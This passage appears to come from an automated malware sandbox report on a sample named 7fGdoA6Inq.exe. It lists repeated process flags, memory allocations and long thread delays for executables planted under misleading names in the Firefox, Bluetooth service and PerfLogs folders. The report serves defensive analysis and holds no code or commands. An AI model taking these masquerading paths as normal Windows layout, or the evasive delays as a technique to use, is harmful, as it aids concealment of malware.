            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeMemory allocated: A70000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeMemory allocated: 1A9D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeMemory allocated: 10A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeMemory allocated: 1AF70000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exeMemory allocated: 2910000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exeMemory allocated: 1A910000 memory reserve | memory write watchJump to behavior
            Source: C:\PerfLogs\wininit.exeMemory allocated: 1290000 memory reserve | memory write watchJump to behavior
            Source: C:\PerfLogs\wininit.exeMemory allocated: 1AF50000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeMemory allocated: 18C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeMemory allocated: 1B3F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeMemory allocated: 12F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeMemory allocated: 1AE70000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeMemory allocated: 1530000 memory reserve | memory write watch
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeMemory allocated: 1B170000 memory reserve | memory write watch
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeMemory allocated: B30000 memory reserve | memory write watch
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeMemory allocated: 1A5E0000 memory reserve | memory write watch
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeMemory allocated: 16A0000 memory reserve | memory write watch
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeMemory allocated: 1B1E0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599813Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599703Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599594Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599485Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599360Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599235Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599110Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598985Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598860Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598735Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598610Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598485Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598360Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598218Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598110Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597985Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597846Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597719Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597312Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597175Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597047Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 596937Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 596827Jump to behavior
            Source: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\PerfLogs\wininit.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599622Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599438Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599219Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599094Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598984Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598875Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598760Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598594Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598450Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598328Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598219Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598109Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598000Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597891Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597781Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597672Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597555Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597438Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597324Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597203Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597094Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 596955Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 596825Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 596659Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 600000
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599875
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599766
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599641
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599529
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599422
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599313
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599188
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599063
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598953
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598844
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598719
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598609
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598494
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598391
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598161
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597972
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597790
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597687
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597578
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597469
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597359
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597250
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597141
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597021
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 596907
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 596782
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 600000
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599875
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599765
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599656
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599547
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599437
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599328
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598937
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598750
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598625
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598514
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598406
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598297
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598187
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598066
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597937
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597828
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597718
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597609
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597500
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597390
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597281
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597171
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597062
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 596953
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 596844
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 600000
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599890
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599781
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599670
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599562
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599452
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599319
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599182
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599074
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598937
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598750
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598609
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598468
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598359
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598250
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598140
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598031
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597921
